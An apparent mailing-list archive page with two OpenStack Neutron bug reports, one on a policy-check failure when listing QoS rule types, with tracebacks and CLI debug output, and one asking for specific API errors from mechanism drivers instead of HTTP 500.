Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487324] [NEW] failed to list qos rule type due to policy check

2015-08-20 Thread yong sheng gong
Public bug reported:

2015-08-21 13:52:36.212 23375 INFO neutron.wsgi [-] (23375) accepted 
('192.168.1.118', 43606)
2015-08-21 13:52:42.711 ERROR neutron.policy 
[req-ba182095-d12d-4bde-a47e-88507e4c4898 demo demo] Unable to verify 
match:%(tenant_id)s as the parent resource: tenant was not found
2015-08-21 13:52:42.711 23375 ERROR neutron.policy Traceback (most recent call 
last):
2015-08-21 13:52:42.711 23375 ERROR neutron.policy   File 
"/mnt/data3/opt/stack/neutron/neutron/policy.py", line 224, in __call__
2015-08-21 13:52:42.711 23375 ERROR neutron.policy parent_res, parent_field 
= do_split(separator)
2015-08-21 13:52:42.711 23375 ERROR neutron.policy   File 
"/mnt/data3/opt/stack/neutron/neutron/policy.py", line 219, in do_split
2015-08-21 13:52:42.711 23375 ERROR neutron.policy separator, 1)
2015-08-21 13:52:42.711 23375 ERROR neutron.policy ValueError: need more than 1 
value to unpack
2015-08-21 13:52:42.711 23375 ERROR neutron.policy
2015-08-21 13:52:42.714 ERROR neutron.api.v2.resource 
[req-ba182095-d12d-4bde-a47e-88507e4c4898 demo demo] index failed
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource Traceback (most 
recent call last):
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/mnt/data3/opt/stack/neutron/neutron/api/v2/resource.py", line 83, in resource
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource result = 
method(request=request, **args)
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/mnt/data3/opt/stack/neutron/neutron/api/v2/base.py", line 339, in index
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource return 
self._items(request, True, parent_id)
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/mnt/data3/opt/stack/neutron/neutron/api/v2/base.py", line 279, in _items
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource 
pluralized=self._collection)]
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/mnt/data3/opt/stack/neutron/neutron/policy.py", line 354, in check
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource 
pluralized=pluralized)
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/usr/lib/python2.7/site-packages/oslo_policy/policy.py", line 487, in enforce
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource result = 
rule(target, creds, self)
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/usr/lib/python2.7/site-packages/oslo_policy/_checks.py", line 238, in __call__
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource return 
enforcer.rules[self.match](target, creds, enforcer)
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/usr/lib/python2.7/site-packages/oslo_policy/_checks.py", line 238, in __call__
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource return 
enforcer.rules[self.match](target, creds, enforcer)
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/usr/lib/python2.7/site-packages/oslo_policy/_checks.py", line 191, in __call__
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource if rule(target, 
cred, enforcer):
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/mnt/data3/opt/stack/neutron/neutron/policy.py", line 246, in __call__
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource 
reason=err_reason)
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource PolicyCheckError: 
Failed to check policy tenant_id:%(tenant_id)s because Unable to verify 
match:%(tenant_id)s as the parent resource: tenant was not found
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource
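
The ValueError at the top of the trace comes from unpacking two values out of
a split that produced only one; a minimal illustration of the failing pattern
(the names below are hypothetical, the real logic lives in neutron/policy.py):

    parts = 'rule_type'.split('.', 1)   # no separator present -> ['rule_type']
    parent_res, parent_field = parts    # ValueError: need more than 1 value to unpack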


$ neutron qos-available-rule-types  -v
DEBUG: keystoneclient.session REQ: curl -g -i -X GET 
http://172.17.42.1:5000/v2.0 -H "Accept: application/json" -H "User-Agent: 
python-keystoneclient"
DEBUG: keystoneclient.session RESP: [200] Content-Length: 337 Vary: 
X-Auth-Token Connection: keep-alive Date: Fri, 21 Aug 2015 05:52:35 GMT 
Content-Type: application/json X-Openstack-Request-Id: 
req-3ff33f59-d69b-412a-8137-0ce5f6deb868 
RESP BODY: {"version": {"status": "stable", "updated": "2014-04-17T00:00:00Z", 
"media-types": [{"base": "application/json", "type": 
"application/vnd.openstack.identity-v2.0+json"}], "id": "v2.0", "links": 
[{"href": "http://172.17.42.1:5000/v2.0/";, "rel": "self"}, {"href": 
"http://docs.openstack.org/";, "type": "text/html", "rel": "describedby"}]}}

DEBUG: stevedore.extension found extension EntryPoint.parse('yaml = 
clifftablib.formatters:YamlFormatter')
DEBUG: stevedore.extension found extension EntryPoint.parse('json = 
clifftablib.formatters:JsonFormatter')
DEBUG: stevedore.extension found extension EntryPoint.parse('html = 
clifftablib.formatters:HtmlFormatter')
DEBUG: stevedore.extension found extension EntryPoint.parse('table = 
cliff.formatters.table:TableFormatter')
DEBUG: stevedore.extension found extension EntryPoint.parse('csv = 
cliff.format

[Yahoo-eng-team] [Bug 1487335] [NEW] Neutron drivers should throw specific error instead of 500 internal server

2015-08-20 Thread Ashish Kumar Gupta
Public bug reported:

When implementing a new mechanism driver for Neutron, you do not get a proper
error reply from the Neutron driver code. For example, when the implemented
mechanism driver raises:
DBDuplicateEntry: (IntegrityError) 
MechanismDriverError: create_port_precommit failed.

the error thrown back to the API client is:
HTTP/1.1 500 Internal Server Error
Content-Type: application/json; charset=UTF-8
Content-Length: 108
X-Openstack-Request-Id: req-efd3e486-23e4-4699-ad74-7c28e8b7c6bf
Date: Wed, 19 Aug 2015 11:00:30 GMT
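
A hedged sketch of the kind of handling this asks for (the exception class and
helper below are illustrative, not Neutron's actual code): translate the
low-level DB failure into a specific, API-mappable fault so the client sees
something like a 409 Conflict instead of an unhandled 500.

    from oslo_db import exception as db_exc

    class DuplicateEntryConflict(Exception):
        """Illustrative stand-in for a Conflict-type (409) API exception."""

    def create_port_precommit_example(write_port_row):
        # write_port_row is any callable that inserts the port's DB row; the
        # point is to catch the duplicate-entry error here and re-raise an
        # error the API layer can map to a specific HTTP fault.
        try:
            write_port_row()
        except db_exc.DBDuplicateEntry:
            raise DuplicateEntryConflict("port entry already exists")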

** Affects: neutron
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1487335

Title:
  Neutron drivers should throw specific error instead of 500 internal
  server

Status in neutron:
  New

Bug description:
  When implementing a new mechanism driver for Neutron, you do not get a
  proper error reply from the Neutron driver code. For example, when the
  implemented mechanism driver raises:
  DBDuplicateEntry: (IntegrityError) 
  MechanismDriverError: create_port_precommit failed.

  the error thrown back to the API client is:
  HTTP/1.1 500 Internal Server Error
  Content-Type: application/json; charset=UTF-8
  Content-Length: 108
  X-Openstack-Request-Id: req-efd3e486-23e4-4699-ad74-7c28e8b7c6bf
  Date: Wed, 19 Aug 2015 11:00:30 GMT

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1487335/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp